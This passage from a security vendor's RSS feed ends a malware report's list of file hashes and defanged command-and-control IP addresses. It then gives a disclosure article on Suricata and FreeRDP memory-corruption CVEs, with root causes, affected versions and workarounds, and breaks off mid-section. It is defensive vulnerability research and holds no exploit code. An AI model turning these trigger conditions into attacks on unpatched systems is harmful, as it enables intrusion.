rel="noopener">6cc838049ece4fcb36386b7a3032171f</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/6d478c7f94d95981eb4b6508844050a6/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______576861f5c8a1872d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">6d478c7f94d95981eb4b6508844050a6</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/7a66cd84e2d007664a66679e86832202/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b978b88fd988255d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7a66cd84e2d007664a66679e86832202</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/7ed3fc831922733d70fb08da7a244224/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10cc60dcd33c1c78&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7ed3fc831922733d70fb08da7a244224</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/9cdb61a758afd9a893add4cef5608914/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______421e27265211899d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9cdb61a758afd9a893add4cef5608914</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/287ccbf005667b263e0e8a1ccfb8daec/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b167d0e93470a1ac&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">287ccbf005667b263e0e8a1ccfb8daec</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/7005c9c6e2502992017f1ffc8ef8a9b9/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______38ce376d1a454cbe&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7005c9c6e2502992017f1ffc8ef8a9b9</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/7355e0790c111a59af377babedee9018/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b9999bda92259713&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7355e0790c111a59af377babedee9018</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/a5af0471e31e5b11fd4d3671501dfc32/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df7e3c50f424a308&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">a5af0471e31e5b11fd4d3671501dfc32</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/da07b0608195a2d5481ad6de3cc6f195/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4540bf7237939e3a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">da07b0608195a2d5481ad6de3cc6f195</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/dd71b279a0bf618bbe9bb5d934ce9caa/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7d370d71c36e402c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dd71b279a0bf618bbe9bb5d934ce9caa</a> – Mach-O 64-bit x86_64 executable</p><p><strong>Malicious installation package</strong><br /><a href="https://opentip.kaspersky.com/8d33f667ca135a88f5bf77a0fab209d4/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8504592d7372f453&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8d33f667ca135a88f5bf77a0fab209d4</a> – Apple software package</p><p><strong>C2 IP addresses</strong><br /><a href="https://opentip.kaspersky.com/111.21.246.147/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9903d53ff2b50e8b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">111.21.246[.]147</a><br /><a href="https://opentip.kaspersky.com/123.232.31.206/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e3542328703b87d0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">123.232.31[.]206</a><br /><a href="https://opentip.kaspersky.com/120.53.133.226/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a94e77445cafe7c0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">120.53.133[.]226</a><br /><a href="https://opentip.kaspersky.com/218.193.83.70/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______282efd4c95d05cc1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">218.193.83[.]70</a><br /><a href="https://opentip.kaspersky.com/29.40.48.21/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0977d34fcc5968c8&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">29.40.48[.]21</a><br /><a href="https://opentip.kaspersky.com/47.100.65.182/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______16cda96f783e34ff&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">47.100.65[.]182</a><br /><a href="https://opentip.kaspersky.com/58.49.21.113/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______81c7c28a2a20618e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">58.49.21[.]113</a><br /><a href="https://opentip.kaspersky.com/113.125.92.32/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c40c8cf92211e838&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">113.125.92[.]32</a><br /><a href="https://opentip.kaspersky.com/218.65.110.180/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2276dbe5f0e621e6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">218.65.110[.]180</a><br /><a href="https://opentip.kaspersky.com/20.60.250.230/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3c4a7fde091a33af&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">20.60.250[.]230</a></p>]]></content:encoded> <wfw:commentRss>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/feed/</wfw:commentRss> <slash:comments>2</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured.jpg" width="1200" height="753"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Memory corruption vulnerabilities in Suricata and FreeRDP</title> <link>https://securelist.com/suricata-freerdp-memory-corruption/113489/</link> <comments>https://securelist.com/suricata-freerdp-memory-corruption/113489/#respond</comments> <dc:creator><![CDATA[Dmitry Shmoylov, Evgeny Legerov, Denis Skvortsov]]></dc:creator> <pubDate>Thu, 22 Aug 2024 10:00:34 +0000</pubDate> <category><![CDATA[Vulnerability reports]]></category> <category><![CDATA[FreeRDP]]></category> <category><![CDATA[Fuzzing]]></category> <category><![CDATA[KasperskyOS]]></category> <category><![CDATA[Memory corruption]]></category> <category><![CDATA[Suricata]]></category> <category><![CDATA[Vulnerabilities]]></category><category><![CDATA[Vulnerabilities and exploits]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113489</guid> <description><![CDATA[While pentesting KasperskyOS-based Thin Client and IoT Secure Gateway, we found several vulnerabilities in the Suricata and FreeRDP open-source projects. We shared details on these vulnerabilities with the community along with our fuzzer.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>As a cybersecurity company, before we release our products, we perform penetration tests on them to make sure they are secure. Recently, new versions of KasperskyOS-based products were released, namely Kaspersky Thin Client (KTC) and Kaspersky IoT Secure Gateway (KISG). As part of the pre-release penetration testing, we analyzed two open-source components used in these products, namely <a href="https://suricata.io/" target="_blank" rel="noopener">Suricata</a> and <a href="https://www.freerdp.com/" target="_blank" rel="noopener">FreeRDP</a> projects, and discovered several vulnerabilities, which we reported to the developers of the corresponding libraries, as well as sharing <a href="https://github.com/ergnoorr/fuzzrdp" target="_blank" rel="noopener">the fuzzing tests</a> we used to test FreeRDP.</p><p>The community confirmed the reported issues and registered the following CVEs:</p><ul><li>FreeRDP: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32041" target="_blank" rel="noopener">CVE-2024-32041</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32039" target="_blank" rel="noopener">CVE-2024-32039</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32040" target="_blank" rel="noopener">CVE-2024-32040</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32458" target="_blank" rel="noopener">CVE-2024-32458</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32459" target="_blank" rel="noopener">CVE-2024-32459</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32460" target="_blank" rel="noopener">CVE-2024-32460</a></li><li>Suricata: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32664" target="_blank" rel="noopener">CVE-2024-32664</a></li></ul><p>Later, using our fuzzing tests, the community found about <a href="https://github.com/FreeRDP/FreeRDP/releases/tag/3.5.1" target="_blank" rel="noopener">10 more vulnerabilities in FreeRDP</a>. All issues were fixed in both open-source projects and in our products prior to the new version releases.</p><h2 id="open-source-components-in-kasperskyos-based-products">Open-source components in KasperskyOS-based products</h2><p>KasperskyOS is a microkernel operating system designed to build <a href="https://os.kaspersky.com/technologies/" target="_blank" rel="noopener">Cyber Immune</a> products. The attack surface is minimized by the built-in security mechanisms, the small size of the microkernel and domain (component) isolation. The latter allows secure implementation of open-source components: even if a particular component contains vulnerabilities, the isolation prevents most of the damage that could be caused by their exploitation.</p><p>The KasperskyOS-based products in question are complex, support various protocols and applications and include open-source components that implement some of their functions. As its name suggests, <a href="https://www.freerdp.com/" target="_blank" rel="noopener">FreeRDP</a> is an open-source implementation of Remote Desktop Protocol. It is used in Kaspersky Thin Client, where it is responsible for remote connection capabilities.</p><p><a href="https://suricata.io/" target="_blank" rel="noopener">Suricata</a> is a network monitoring, intrusion detection and prevention system developed by the Open Information Security Foundation and the Suricata community. It is widely used and implemented by most public and private organizations. When it comes to KasperskyOS-based products, Suricata is used in KISG, where it is responsible for detecting network attacks. It receives a copy of network traffic, analyzes it according to a set of rules and issues alerts if an attack is detected.</p><p>Although component isolation in KasperskyOS ensures the security of our products even if an open-source component contains vulnerabilities, when assessing the security of our products we follow the defense-in-depth approach. The OS design minimizes the attack surface, but it can’t stop cybercriminals and high-profile actors from trying to find a way to penetrate the system. That’s why we test (and, if necessary, fix) all components of our products, including the open-source projects we use.</p><p>Penetration testing begins by describing the entire attack surface, which includes all components and all known attack vectors against them.</p><h2 id="cve-2024-32664-out-of-bounds-write-in-suricata">CVE-2024-32664: out-of-bounds write in Suricata</h2><p>During our penetration testing activities we found three issues in Suricata. Two of them were considered bad practice, and one was registered as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32664" target="_blank" rel="noopener">CVE-2024-32664</a>. The vulnerability affects all Suricata versions from 6.0.0 to 6.0.18 and from 7.0.0 to 7.0.4, and is fixed in versions 6.0.19 and 7.0.5. It was initially assessed as being a medium severity issue (CVSS 5.3). However, in the tickets on the Open Information Security Foundation website, the severity was changed to <a href="https://redmine.openinfosecfoundation.org/issues/6905?tab=history" target="_blank" rel="noopener">high</a> for versions 7.0.x and to <a href="https://redmine.openinfosecfoundation.org/issues/6931?tab=notes" target="_blank" rel="noopener">critical</a> for 6.0.x.</p><p>The vulnerability resides in Suricata’s base64 decoding function, <a href="https://github.com/OISF/suricata/blob/789353bc1e1aa23d075f16af25df84df00c68682/src/util-base64.c#L109-L206" target="_blank" rel="noopener">DecodeBase64</a>, and belongs to the out-of-bounds write type. In a situation where the buffer is full, it is possible to use specially crafted input to trick the function into thinking that there is some space left and writing three more bytes to the buffer. In base64, if the size of the unencoded data is not a multiple of three, a padding is added to the encoded output. It typically equals one or two. The decoding function accepts encoded data as input, which means that the padding is controlled by the attacker. If they provide an encoded string where the padding equals three or four, a memory corruption occurs, leading to a limited buffer overflow, which may result in remote code execution.</p><div id="attachment_113492" style="width: 663px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113492" class="size-large wp-image-113492" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-653x1024.png" alt="Vulnerable code in Suricata:line 45 – if 'padding' is equal to B64_BLOCK(4) or ASCII_BLOCK(3), 'numDecoded_blk' will be set to 0;line 46 – we will pass this check, as 'dest_size' is equal to '*decoded_bytes'; line 53 – 3 bytes will be written past the end of buffer 'dptr';line 72 – similar issue." width="653" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-653x1024.png 653w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-191x300.png 191w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-768x1205.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-223x350.png 223w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-637x1000.png 637w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-178x280.png 178w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-574x900.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01.png 875w" sizes="(max-width: 653px) 100vw, 653px" /></a><p id="caption-attachment-113492" class="wp-caption-text">Vulnerable code in Suricata:<br />line 45 – if ‘padding’ is equal to B64_BLOCK(4) or ASCII_BLOCK(3), ‘numDecoded_blk’ will be set to 0;<br />line 46 – we will pass this check, as ‘dest_size’ is equal to ‘*decoded_bytes’;<br />line 53 – 3 bytes will be written past the end of buffer ‘dptr’;<br />line 72 – similar issue.</p></div><p>The issue was <a href="https://github.com/OISF/suricata/commit/fd47e67dc65f9111895c88fb406c938b1f857325" target="_blank" rel="noopener">patched</a> in Suricata versions 6.0.19 and 7.0.5. For those, who are unable to install these updates, the following recommendations to mitigate the threat were provided by the community:</p><ul><li>Do not load untrusted datasets</li><li>Do not use rules with a ‘base64_decode’ keyword with a ‘bytes’ option with a value of 1, 2 or 5</li></ul><p>For the software versions 7.0.x you can also set ‘app-layer.protocols.smtp.mime.body-md5’ to false.</p><h2 id="freerdp-vulnerabilities">FreeRDP vulnerabilities</h2><p>The vulnerabilities in FreeRDP were found using <a href="https://github.com/ergnoorr/fuzzrdp" target="_blank" rel="noopener">a simple FreeRDP fuzzer</a>. They affect all FreeRDP 3.x.x versions prior to 3.5.0 and all FreeRDP 2.x.x versions prior to 2.11.6, where they were fixed.</p><h3 id="cve-2024-32041">CVE-2024-32041</h3><p>This vulnerability resides in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/zgfx.c#L217-L368" target="_blank" rel="noopener">zgfx_decompress_segment</a> function of the ZGFX decoder and is an out-of-bounds read vulnerability. The absence of a necessary check may lead to a situation where a certain number of bytes of data are accessed that shouldn’t be.</p><p>This vulnerability may be exploited by a malicious server to gain access to a portion of the client memory. It may be used to bypass address space layout randomization (ASLR) to get the address space layout for a particular process and perform an attack against that process.</p><div id="attachment_113493" style="width: 731px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113493" class="size-large wp-image-113493" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-721x1024.png" alt="Vulnerable code in the 'zgfx_decompress_segment' function:line 48 – the variable 'count' is checked to make sure it is not greater than the size of allocated space in the output buffer;lines 54-55 – the variable 'count' is not checked against the size of the decoded array. Hence the out-of-bounds read." width="721" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-721x1024.png 721w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-211x300.png 211w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-768x1091.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-246x350.png 246w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-704x1000.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-197x280.png 197w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-634x900.png 634w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02.png 876w" sizes="(max-width: 721px) 100vw, 721px" /></a><p id="caption-attachment-113493" class="wp-caption-text">Vulnerable code in the ‘zgfx_decompress_segment’ function:<br />line 48 – the variable ‘count’ is checked to make sure it is not greater than the size of allocated space in the output buffer;<br />lines 54-55 – the variable ‘count’ is not checked against the size of the decoded array. Hence the out-of-bounds read.</p></div><p>As a workaround for users who cannot install the fixed version of FreeRDP, the community recommends deactivating the “/gfx” connection method, which is on by default, and set “/bpp” or “/rfx” instead.</p><h3 id="cve-2024-32039">CVE-2024-32039</h3><p>This is an integer overflow and out-of-bounds write vulnerability in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/clear.c#L352-L441" target="_blank" rel="noopener">clear_decompress_residual_data</a> function in the Clear codec component. The ‘runLengthFactor’ variable is read from the stream, which can be controlled by the attacker. The code performs a sanity check to make sure it is not bigger than the size of the array to be written to. This sanity check contains an error that allows the attacker to bypass it via unsigned integer overflow and write outside the allocated buffer. Exploitation of this vulnerability could lead to remote code execution on the client.</p><div id="attachment_113494" style="width: 765px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113494" class="size-large wp-image-113494" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-755x1024.png" alt="Vulnerable code in the 'clear_decompress_residual_data' function:line 23 – the variable 'runLengthFactor' is an unsigned integer (uint32);line 42 – the variable 'runLengthFactor' is read from the stream;line 47 – due to an unsigned integer overflow, if the 'runLengthFactor' value is large enough, the 'pixelIndex+runLengthFactor' value approaches zero, and the check is passed;lines 56-60 – the 'for' cycle uses the original 'runLengthFactor' value and is written outside 'dstBuffer'." width="755" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-755x1024.png 755w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-221x300.png 221w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-768x1041.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-258x350.png 258w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-737x1000.png 737w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-206x280.png 206w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-664x900.png 664w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03.png 882w" sizes="(max-width: 755px) 100vw, 755px" /></a><p id="caption-attachment-113494" class="wp-caption-text">Vulnerable code in the ‘clear_decompress_residual_data’ function:<br />line 23 – the variable ‘runLengthFactor’ is an unsigned integer (uint32);<br />line 42 – the variable ‘runLengthFactor’ is read from the stream;<br />line 47 – due to an unsigned integer overflow, if the ‘runLengthFactor’ value is large enough, the ‘pixelIndex+runLengthFactor’ value approaches zero, and the check is passed;<br />lines 56-60 – the ‘for’ cycle uses the original ‘runLengthFactor’ value and is written outside ‘dstBuffer’.</p></div><p>As a workaround for the unpatched versions, it is recommended to use “/bpp:32” or “/rfx” instead of the “/gfx” codec that is enabled by default.</p><h3 id="cve-2024-32040">CVE-2024-32040</h3><p>This integer underflow vulnerability affects FreeRDP connections that use the NSC codec responsible for bitmap compression. It resides in the <a href="https://github.com/FreeRDP/FreeRDP/blob/aa3d05f4f2c1d361f061402add8aed88174aac6d/libfreerdp/codec/nsc.c#L113-L189" target="_blank" rel="noopener">nsc_rle_decode</a> function of this component. The absence of a necessary check may lead to a situation when the size of unprocessed input data is less than 0. As it is an unsigned integer variable, it will become a large positive value in this case. This may lead to an out-of-bounds read of a large amount of data.</p><div id="attachment_113495" style="width: 604px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113495" class="size-large wp-image-113495" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-594x1024.png" alt="Vulnerable code in the nsc_rle_decode function:lines 45-48 – the variable 'len' is read from the attacker-controlled stream;line 51 – suppose 'len' is a large integer and it is less than 'outSize', thus we can pass this check;line 57 – there is no check to ensure that 'left' is greater than 'len', which may result in an unsigned integer underflow, and the big value of the 'left' variable;line 6 – the big value of the 'left' variable passes the check, and the next iteration starts reading outside the memory bounds." width="594" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-594x1024.png 594w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-174x300.png 174w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-203x350.png 203w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-580x1000.png 580w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-162x280.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-522x900.png 522w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04.png 742w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-113495" class="wp-caption-text">Vulnerable code in the nsc_rle_decode function:<br />lines 45-48 – the variable ‘len’ is read from the attacker-controlled stream;<br />line 51 – suppose ‘len’ is a large integer and it is less than ‘outSize’, thus we can pass this check;<br />line 57 – there is no check to ensure that ‘left’ is greater than ‘len’, which may result in an unsigned integer underflow, and the big value of the ‘left’ variable;<br />line 6 – the big value of the ‘left’ variable passes the check, and the next iteration starts reading outside the memory bounds.</p></div><p>As a workaround in a situation where installing the patched version is impossible, it is recommended not to use the codec in question.</p><h3 id="cve-2024-32458">CVE-2024-32458</h3><p>This is an out-of-bounds read vulnerability in the <a href="https://github.com/FreeRDP/FreeRDP/blob/9da3f236985207378abe64bc401cecd8566e4542/libfreerdp/codec/planar.c#L166-L228" target="_blank" rel="noopener">planar_skip_plane_rle</a> function in the Planar codec component. No checks are implemented for the planes array elements in the function code. As a result, the SrcSize variable may exceed the amount of available data, which may result in an out-of-bounds read. An attacker may attempt to bypass ASLR using this vulnerability.</p><div id="attachment_113496" style="width: 842px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113496" class="size-large wp-image-113496" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-832x1024.png" alt="Vulnerable code in the planar_skip_plane_rle function:line 13 – no check is performed to ensure the size is no less than the offset to plane. If it is small enough, an unsigned integer underflow occurs;line 45 – as a result, SrcSize can exceed the amount of available data;line 52 – out-of-bounds read on this line." width="832" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-832x1024.png 832w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-244x300.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-768x946.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-284x350.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-740x911.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-227x280.png 227w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-731x900.png 731w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05.png 838w" sizes="(max-width: 832px) 100vw, 832px" /></a><p id="caption-attachment-113496" class="wp-caption-text">Vulnerable code in the planar_skip_plane_rle function:<br />line 13 – no check is performed to ensure the size is no less than the offset to plane. If it is small enough, an unsigned integer underflow occurs;<br />line 45 – as a result, SrcSize can exceed the amount of available data;<br />line 52 – out-of-bounds read on this line.</p></div><p>You can find the fix for the vulnerability <a href="https://github.com/FreeRDP/FreeRDP/commit/9da3f236985207378abe64bc401cecd8566e4542" target="_blank" rel="noopener">here</a>. As a workaround for unpatched systems, it is recommended to use “/gfx” or “/rfx” connection methods. Note that the “/gfx” method is enabled by default and it is recommended to disable it to mitigate other vulnerabilities in this list.</p><h3 id="cve-2024-32459">CVE-2024-32459</h3><p>This is an out-of-bounds read vulnerability in <a href="https://github.com/FreeRDP/FreeRDP/blob/70eec6c18e86f21c31ba254aa0e798330a95fc71/libfreerdp/codec/ncrush.c#L2015-L2312" target="_blank" rel="noopener">ncrush_decompress</a> function of the ncrush codec. If the source data size is small, up to four extra bytes could be read, which could be used to bypass ASLR.</p><div id="attachment_113497" style="width: 756px" class="wp-caption 